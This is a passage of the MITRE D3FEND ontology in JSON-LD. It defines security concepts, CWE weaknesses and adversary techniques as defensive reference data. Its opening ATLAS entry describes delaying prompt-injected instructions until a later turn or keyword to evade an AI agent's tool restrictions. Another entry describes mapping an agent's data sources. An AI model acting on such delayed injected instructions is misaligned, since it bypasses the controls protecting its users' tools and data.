      "d3f:definition": "Adversaries may include instructions to be followed by the AI system in response to a future event, such as a specific keyword or the next interaction, in order to evade detection or bypass controls placed on the AI system.\n\nFor example, an adversary may include \"If the user submits a new request...\" followed by the malicious instructions as part of their prompt.\n\nAI agents can include security measures against prompt injections that prevent the invocation of particular tools or access to certain data sources during a conversation turn that has untrusted data in context. Delaying the execution of instructions to a future interaction or keyword is one way adversaries may bypass this type of control.",
      "rdfs:label": "Delay Execution of LLM Instructions - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0094"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Delay Execution of LLM Instructions"
    },
    {
      "@id": "d3f:Reference-Windows-Management-Instrumentation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ConfigurationInventory"
        },
        {
          "@id": "d3f:HardwareComponentInventory"
        },
        {
          "@id": "d3f:NetworkNodeInventory"
        },
        {
          "@id": "d3f:SoftwareInventory"
        }
      ],
      "d3f:kb-reference-title": "Windows Management Instrumentation",
      "rdfs:label": "Reference - Windows Management Instrumentation (WMI)"
    },
    {
      "@id": "d3f:AML.T0084.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0084.000",
      "d3f:definition": "Adversaries may attempt to discover the data sources a particular agent can access.  The AI agent's configuration may reveal data sources or knowledge.\n\nThe embedded knowledge may include sensitive or proprietary material such as intellectual property, customer data, internal policies, or even credentials. By mapping what knowledge an agent has access to, an adversary can better understand the AI agent's role and potentially expose confidential information or pinpoint high-value targets for further exploitation.",
      "rdfs:label": "Embedded Knowledge - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0084.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0084"
      },
      "skos:prefLabel": "Embedded Knowledge"
    },
    {
      "@id": "d3f:RadioModem",
      "@type": "owl:Class",
      "d3f:definition": "A radio modem provides the means to send digital data wirelessly.  Radio modems are used to communicate by direct broadcast satellite, WiFi, WiMax, mobile phones, GPS, Bluetooth and NFC. Modern telecommunications and data networks also make extensive use of radio modems where long distance data links are required. Such systems are an important part of the PSTN, and are also in common use for high-speed computer network links to outlying areas where fiber optic is not economical.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Modem#Radio"
      },
      "rdfs:label": "Radio Modem",
      "rdfs:subClassOf": {
        "@id": "d3f:Modem"
      }
    },
    {
      "@id": "d3f:CWE-433",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-433",
      "d3f:definition": "The product stores raw content or supporting code under the web document root with an extension that is not specifically handled by the server.",
      "rdfs:label": "Unparsed Raw Web Content Delivery",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-219"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingThreatsUsingMetadataVectors_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160191551A1"
      },
      "d3f:kb-abstract": "An approach for detecting network attacks using metadata vectors may initially involve receiving network communications or packets, extracting metadata items from the packets. The metadata items describe the communications without requiring deep content inspection of the data payload or contents. The communications may be clustered into groups using the metadata items. If a cluster exceeds a threshold, an alarm may be generated.",
      "d3f:kb-author": "Nicolas BEAUCHESNE; David Lopes Pegna; Karl Lynn",
      "d3f:kb-mitre-analysis": "This patent describes detecting network threats by first passively collecting network traffic and storing it for processing. Metadata from network traffic such as packet header information or information about a session (ex. time between request/responses) is extracted. After the metadata is extracted, the data is grouped into cluster maps of matching events to track how many instances of a network communication have occurred, such as five requests sent and five responses received. Threshold limits are set on the clusters to monitor them and if a cluster grows too large (ex. ten instances of requests and responses) this can correspond to unauthorized behavior. This method might detect, for example, a network attack using malicious payloads with automated scripts, in which a bot sends replicated malicious payloads to the same destination port.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProtocolMetadataAnomalyDetection"
      },
      "d3f:kb-reference-title": "Method and system for detecting threats using metadata vectors",
      "rdfs:label": "Reference - Method and system for detecting threats using metadata vectors - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:T0860",
      "@type": "owl:Class",
      "d3f:attack-id": "T0860",
      "d3f:definition": "Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance.",
      "rdfs:label": "Wireless Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Wireless Compromise"
    },
    {
      "@id": "d3f:CWE-272",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-272",
      "d3f:definition": "The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed.",
      "rdfs:label": "Least Privilege Violation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-271"
      }
    },
    {
      "@id": "d3f:WindowsOpenThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Opens an existing thread object.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtOpenThread"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openthread"
      },
      "rdfs:label": "Windows OpenThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPITraceThread"
        },
        {
          "@id": "_:N2ede80257aef4c5a90823516c954e750"
        }
      ]
    },
    {
      "@id": "_:N2ede80257aef4c5a90823516c954e750",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtOpenThread"
      }
    },
    {
      "@id": "d3f:CWE-440",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-440",
      "d3f:definition": "A feature, API, or function does not perform according to its specification.",
      "rdfs:label": "Expected Behavior Violation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-684"
      }
    },
    {
      "@id": "d3f:T1007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1007",
      "d3f:definition": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.",
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetRunningProcesses"
        }
      ],
      "rdfs:label": "System Service Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N465c68767d104a0b8ed613a500c4aea5"
        },
        {
          "@id": "_:N13521812d3f44c4aac6440f185df116b"
        }
      ]
    },
    {
      "@id": "_:N465c68767d104a0b8ed613a500c4aea5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N13521812d3f44c4aac6440f185df116b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetRunningProcesses"
      }
    },
    {
      "@id": "d3f:HardDiskFirmware",
      "@type": "owl:Class",
      "d3f:definition": "Firmware that is installed on a hard disk device.",
      "rdfs:label": "Hard Disk Firmware",
      "rdfs:seeAlso": {
        "@id": "dbr:Hard_disk_drive"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      },
      "skos:altLabel": "Hard Drive Firmware"
    },
    {
      "@id": "d3f:NetworkNode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In telecommunications networks, a node (Latin nodus, 'knot') is either a redistribution point or a communication endpoint. The definition of a node depends on the network and protocol layer referred to. A physical network node is an electronic device that is attached to a network, and is capable of creating, receiving, or transmitting information over a communications channel. A passive distribution point such as a distribution frame or patch panel is consequently not a node.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Node_(networking)"
      },
      "rdfs:label": "Network Node",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:LocalFilePermissions",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LocalFilePermissions"
      ],
      "d3f:d3fend-id": "D3-LFP",
      "d3f:definition": "Local file permissions is the systematic process of defining, implementing, and managing access control policies that dictate user permissions for accessing files on a local system through the configuration of operating system functionality.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FileAndFolderPermissions"
      },
      "d3f:restricts": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:File"
        }
      ],
      "rdfs:label": "Local File Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "_:N3373c4967f454007ba3a83386ff9bd1f"
        },
        {
          "@id": "_:Nf51688758db1435da2aac9753332cd01"
        }
      ]
    },
    {
      "@id": "_:N3373c4967f454007ba3a83386ff9bd1f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "_:Nf51688758db1435da2aac9753332cd01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:produced-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x produced-by y: The entity x is created by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:produces"
      },
      "rdfs:label": "produced-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEGETREGS",
      "@type": "owl:Class",
      "d3f:definition": "Copy the tracee's general-purpose or floating-point registers, respectively, to the address data in the tracer.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_GETREGS",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISaveRegisters"
      }
    },
    {
      "@id": "d3f:kb-reference-title",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x kb-reference-title y: The d3fend knowledge base reference x has the reference title string y.",
      "rdfs:label": "kb-reference-title",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-data-property"
      }
    },
    {
      "@id": "d3f:CWE-1342",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1342",
      "d3f:definition": "The processor does not properly clear microarchitectural state after incorrect microcode assists or speculative execution, resulting in transient execution.",
      "rdfs:label": "Information Exposure through Microarchitectural State after Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:AML.T0046",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0046",
      "d3f:definition": "Adversaries may spam the AI system with chaff data that causes an increase in the number of detections.\nThis can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.",
      "rdfs:label": "Spamming AI System with Chaff Data - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0046"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Spamming AI System with Chaff Data"
    },
    {
      "@id": "d3f:MemoryDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event marking the release or deallocation of memory resources, reclaiming them for reuse within the system.",
      "rdfs:label": "Memory Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:Ne30c346556514fc5a09bef7153f5be4a"
        },
        {
          "@id": "_:Ne154260f52104b058e8bd178bd9a46d1"
        }
      ]
    },
    {
      "@id": "_:Ne30c346556514fc5a09bef7153f5be4a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "_:Ne154260f52104b058e8bd178bd9a46d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:Semi-supervisedTransductiveLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSTL",
      "d3f:definition": "The goal of transductive learning is to infer the correct labels for the given unlabeled data x_{l+1}, ..., x_{l+u} only.",
      "d3f:kb-article": "## References\nSemi-Supervised Learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Semi-Supervised_Learning#Semi-supervised_learning).\n\nZhou, D., & Li, M. (2005). Semi-supervised learning by higher order regularization. In Proceedings of the 43rd Annual Meeting of the Association for Computational Linguistics (ACL) (pp. 1-9). [Link](https://www.cs.sfu.ca/~anoop/papers/pdf/semisup_naacl.pdf).",
      "rdfs:label": "Semi-supervised Transductive Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:kb-author",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x kb-author y: The reference x has some author y.",
      "rdfs:domain": {
        "@id": "d3f:TechniqueReference"
      },
      "rdfs:label": "kb-author",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-reference-annotation"
      }
    },
    {
      "@id": "d3f:TunnelRenewEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the lifecycle of a network tunnel is extended, ensuring continued encapsulated communication and avoiding session expiration.",
      "rdfs:label": "Tunnel Renew Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TunnelEvent"
        },
        {
          "@id": "_:N6c835c2cb5754d84b9ca711b19f50f13"
        }
      ]
    },
    {
      "@id": "_:N6c835c2cb5754d84b9ca711b19f50f13",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TunnelOpenEvent"
      }
    },
    {
      "@id": "d3f:IntranetDNSLookup",
      "@type": "owl:Class",
      "d3f:definition": "An Intranet Domain Name System (DNS) lookup is a DNS lookup made from a host on a network that is resolved after querying a DNS name server hosted on that same network.",
      "rdfs:label": "Intranet DNS Lookup",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:WatchdogTimer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A watchdog timer (WDT, or simply a watchdog) is an electronic or software timer that is used to detect and recover from computer malfunctions.",
      "d3f:synonym": [
        "WDT",
        "Watchdog"
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Watchdog_timer"
      },
      "rdfs:label": "Watchdog Timer",
      "rdfs:subClassOf": {
        "@id": "d3f:Timer"
      }
    },
    {
      "@id": "d3f:SoftwareLibraryFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Subroutine"
      },
      "d3f:definition": "A software library is a collection of software components that are used to build a software product.",
      "d3f:may-contain": [
        {
          "@id": "d3f:ExecutableBinary"
        },
        {
          "@id": "d3f:ExecutableScript"
        }
      ],
      "rdfs:label": "Software Library File",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Library_(computing)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:Ncf07a21b9c3e4b7e87f66fa98b429b5c"
        },
        {
          "@id": "_:N5b2e8fcd4a0e4607a3dbd60d3a2c570d"
        },
        {
          "@id": "_:Ncb036fc8740c40fc8e7cba461da340d3"
        }
      ]
    },
    {
      "@id": "_:Ncf07a21b9c3e4b7e87f66fa98b429b5c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "_:N5b2e8fcd4a0e4607a3dbd60d3a2c570d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "_:Ncb036fc8740c40fc8e7cba461da340d3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:MathematicalFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Computes mathematical expressions.",
      "rdfs:label": "Mathematical Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:T0824",
      "@type": "owl:Class",
      "d3f:attack-id": "T0824",
      "d3f:definition": "Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "I/O Module Discovery - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "I/O Module Discovery"
    },
    {
      "@id": "d3f:CWE-1102",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1102",
      "d3f:definition": "The code uses a data representation that relies on low-level data representation or constructs that may vary across different processors, physical machines, OSes, or other physical components.",
      "rdfs:label": "Reliance on Machine-Dependent Data Representation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-758"
      }
    },
    {
      "@id": "d3f:CWE-514",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-514",
      "d3f:definition": "A covert channel is a path that can be used to transfer information in a way not intended by the system's designers.",
      "rdfs:label": "Covert Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1229"
      }
    },
    {
      "@id": "d3f:LM-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0004",
      "d3f:definition": "Docking, berthing, or short-duration attach events create high-trust, high-bandwidth connections between vehicles. During these operations, automatic sequences verify latches, exchange status, synchronize time, and enable umbilicals that carry data and power; maintenance tools may also push firmware or tables across the interface. An attacker positioned on the visiting vehicle can exploit these handshakes and service channels to inject commands, transfer files, or access bus gateways on the host. Because many actions are expected “just after dock,” malicious traffic can ride the same procedures that commission the interface, allowing lateral movement from the visiting craft into the target spacecraft’s C&DH, payload, or support subsystems.",
      "rdfs:label": "Visiting Vehicle Interface(s) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Visiting Vehicle Interface(s)"
    },
    {
      "@id": "d3f:DigitalIdentity",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The unique representation of a subject engaged in an online transaction. A digital identity is always unique in the context of a digital service, but does not necessarily need to uniquely identify the subject in all contexts. In other words, accessing a digital service may not mean that the subject's real-life identity is known.  Note: There is no single, widely accepted definition for this term and context is important. This definition is specific to online transactions.",
      "d3f:identified-by": {
        "@id": "d3f:Identifier"
      },
      "rdfs:comment": "Variously describes or designates.  Designation is not complete or definite without context.  The representation generally can be identified by a unique identifier, though this may be private information.",
      "rdfs:label": "Digital Identity",
      "rdfs:seeAlso": {
        "@id": "https://pages.nist.gov/800-63-3/sp800-63-3.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Ndf0617515ff547eca2a565665c1215e2"
        }
      ]
    },
    {
      "@id": "_:Ndf0617515ff547eca2a565665c1215e2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identified-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Identifier"
      }
    },
    {
      "@id": "d3f:T1418.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1418.001",
      "d3f:definition": "Adversaries may attempt to get a listing of security applications and configurations that are installed on a device. This may include things such as mobile security products. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions.",
      "rdfs:label": "Security Software Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1418"
      },
      "skos:prefLabel": "Security Software Discovery"
    },
    {
      "@id": "d3f:Second-stageBootLoader",
      "@type": "owl:Class",
      "d3f:definition": "An optional, often feature-rich, second-stage set of routines run in order to load the operating system.",
      "rdfs:label": "Second-stage Boot Loader",
      "rdfs:subClassOf": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:may-query",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-query",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:Forecasting",
      "@type": "owl:Class",
      "rdfs:label": "Forecasting",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:PhysicalDataDiode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device that physically enforces one-way (unidirectional) network communication.",
      "rdfs:isDefinedBy": {
        "@id": "https://isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/Industrial%20Cybersecurity%20Knowledge%20FINAL.pdf?hsLang=en"
      },
      "rdfs:label": "Physical Data Diode",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      },
      "skos:example": {
        "@id": "https://owlcyberdefense.com/products/data-diode-products/"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyReadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a registry key is accessed to query its structure, properties, or associated metadata without modifying its state.",
      "rdfs:label": "Windows Registry Key Read Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:N7213cc8faf7b4918aad0506a5d62f4e0"
        }
      ]
    },
    {
      "@id": "_:N7213cc8faf7b4918aad0506a5d62f4e0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:Actuator",
      "@type": "owl:Class",
      "d3f:definition": "An actuator is a mechanical or electromechanical device that, upon receiving a relatively low-energy control signal (e.g., electrical voltage, fluid pressure, or human force), translates its primary energy source (electric, hydraulic, or pneumatic) into targeted mechanical motion or adjustment. It typically works in conjunction with a control device (like a valve or logic driver) and is central to automation, enabling machines or systems to move, open, close, or otherwise manipulate their components or environment. By amplifying or redirecting energy from one form to another, the actuator executes control commands, thereby automating processes in industrial, automotive, aerospace, and other domains where precise mechanical action is essential.",
      "rdfs:label": "Actuator",
      "rdfs:seeAlso": {
        "@id": "dbr:Actuator"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OutputDevice"
      }
    },
    {
      "@id": "d3f:DecoyPublicRelease",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyPublicRelease"
      ],
      "d3f:d3fend-id": "D3-DPR",
      "d3f:definition": "Issuing publicly released media to deceive adversaries.",
      "d3f:kb-article": "## How it works\nPublicly released media includes press releases, videos, or other marketing collateral. The media may include URLs, points of contact, or other identifiers to entice interaction from adversaries.\n\n## Considerations\n* Information used in decoy publicly released media must contain enough realism to deceive and provide interaction from adversaries.\n* Continuous development, creation, and distribution of media and identifiers are needed to ensure adversary interaction continues over time.\n* Decoy public releases could be placed on platforms with different degrees of ownership, including entirely enterprise-owned infrastructure, IaaS, and SaaS (including social applications). Platforms that are not entirely enterprise-owned may be more likely to gather information",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MockAttackCybersecurityTrainingSystemAndMethods_WOMBATSECURITYTECHNOLOGIESInc"
      },
      "rdfs:label": "Decoy Public Release",
      "rdfs:subClassOf": {
        "@id": "d3f:DecoyObject"
      }
    },
    {
      "@id": "d3f:T1646",
      "@type": "owl:Class",
      "d3f:attack-id": "T1646",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
      "rdfs:label": "Exfiltration Over C2 Channel - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration Over C2 Channel"
    },
    {
      "@id": "d3f:CWE-55",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-55",
      "d3f:definition": "The product accepts path input in the form of single dot directory exploit ('/./') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '/./' (Single Dot Directory)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:MultipleRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MR",
      "d3f:definition": "Multiple (linear) regression attempts to model the relationship between two or more explanatory variables and a response variable by fitting a linear equation to observed data.",
      "d3f:kb-article": "## References\nYale University Department of Statistics. (1997-98). Linear regression and multivariate analysis. [Link](http://www.stat.yale.edu/Courses/1997-98/101/linmult.htm)",
      "d3f:synonym": "Multiple Linear Regression",
      "rdfs:label": "Multiple Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:SoftwareDeploymentTool",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Software that coordinates the deployment process of software to systems, typically remotely.",
      "rdfs:label": "Software Deployment Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1592.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592.004",
      "d3f:definition": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.",
      "rdfs:label": "Client Configurations",
      "rdfs:subClassOf": {
        "@id": "d3f:T1592"
      }
    },
    {
      "@id": "d3f:System",
      "@type": "owl:Class",
      "d3f:definition": "An artifact (instrumentality) that combines interrelated interacting artifacts designed to work as a coherent entity.  [Note that not all digital artifacts are systems nor are all systems digital artifacts.]",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/04384144-n"
      },
      "rdfs:label": "System",
      "rdfs:subClassOf": {
        "@id": "d3f:Artifact"
      }
    },
    {
      "@id": "d3f:T1071",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071",
      "d3f:definition": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:pref-label": "Application Layer Protocol C2",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Application Layer Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N6cc6bddc3b074d25a2e90ae60ff1a5aa"
        },
        {
          "@id": "_:Ned54efe517ab4fb1995d0a2da6494930"
        }
      ]
    },
    {
      "@id": "_:N6cc6bddc3b074d25a2e90ae60ff1a5aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:Ned54efe517ab4fb1995d0a2da6494930",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:synonym",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "an equivalent term.",
      "rdfs:label": "synonym",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:CCI-002005_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
